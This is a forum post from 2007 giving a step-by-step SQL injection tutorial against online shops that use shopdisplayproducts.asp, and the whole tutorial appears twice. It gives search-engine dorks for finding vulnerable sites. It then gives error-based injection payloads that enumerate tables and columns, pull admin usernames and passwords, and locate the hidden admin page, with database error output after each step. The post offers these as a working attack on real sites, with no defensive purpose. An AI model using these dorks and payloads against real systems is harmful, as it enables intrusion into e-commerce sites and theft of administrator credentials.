phucxp
03-02-2007, 12:12 AM
Search keys:
{allinurl:”shopdisplayproducts.asp?id="}
{allinurl:”.com/shopdisplayproducts.asp?id= "}
**Notes:
_".com" can be replaced by ".net.","biz.",".us"
_"id" can be replaced by "cat"
when searching we can add value for "id=" , It will help searching shop easier
//////////////////////////////////////////////////////////////
If the Error is:Unclosed quotation mark before the character string
we use this script to get tables :
{and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password }
**Notes:
_ We must delete the mark "'" before add script
_ If in the url appear %20, Don't worry, It's just ASCII of space because IE don't accept space in url
If the error is:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
the result 'ver_Faq' is the first of the table, then we add this script to the url
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password}
The result is:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
then we add this script to the url:
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq','coupons')))--sp_password}
We continue doing that until we find the tables like :users, tbluser,AdminUsers......
For Example: in this case , the table is "tbluser".
we use this to take column :
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password}
the result is:
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
we add this script:
{and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Take the next column by the script:
{1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Now we can take username and password T_T
//////////////////////////////////////////////////////////////////////////
*Take user by this script:
{and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
----------> username is "admin".
*Take password by this script:
{and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
----------> pass is "1234"
*Or take username/password by this script:
{and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password}
***** "%2b" is ascii of "+"
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
---------->username/password is "admin/1234"
///////////////////////////////////////////////////////////////////////////
Now we search link admin:
We know that column "fieldvalue" and "fieldname" contain admin link.
Column "fieldvalue" and "fieldname" are often inside table "configuration".
The table "congratulation" is always renamed.
So we must use the key "like" to search column "filedvalue":
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25filedvalue%25')))--sp_password}
We use this script to take admin link:
{and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
{allinurl:”shopdisplayproducts.asp?id="}
{allinurl:”.com/shopdisplayproducts.asp?id= "}
**Notes:
_".com" can be replaced by ".net.","biz.",".us"
_"id" can be replaced by "cat"
when searching we can add value for "id=" , It will help searching shop easier
//////////////////////////////////////////////////////////////
If the Error is:Unclosed quotation mark before the character string
we use this script to get tables :
{and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password }
**Notes:
_ We must delete the mark "'" before add script
_ If in the url appear %20, Don't worry, It's just ASCII of space because IE don't accept space in url
If the error is:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
the result 'ver_Faq' is the first of the table, then we add this script to the url
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password}
The result is:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
then we add this script to the url:
{and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq','coupons')))--sp_password}
We continue doing that until we find the tables like :users, tbluser,AdminUsers......
For Example: in this case , the table is "tbluser".
we use this to take column :
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password}
the result is:
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
we add this script:
{and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Take the next column by the script:
{1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Now we can take username and password T_T
//////////////////////////////////////////////////////////////////////////
*Take user by this script:
{and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
----------> username is "admin".
*Take password by this script:
{and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
----------> pass is "1234"
*Or take username/password by this script:
{and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password}
***** "%2b" is ascii of "+"
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
---------->username/password is "admin/1234"
///////////////////////////////////////////////////////////////////////////
Now we search link admin:
We know that column "fieldvalue" and "fieldname" contain admin link.
Column "fieldvalue" and "fieldname" are often inside table "configuration".
The table "congratulation" is always renamed.
So we must use the key "like" to search column "filedvalue":
{and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25filedvalue%25')))--sp_password}
We use this script to take admin link:
{and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password}
the result is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93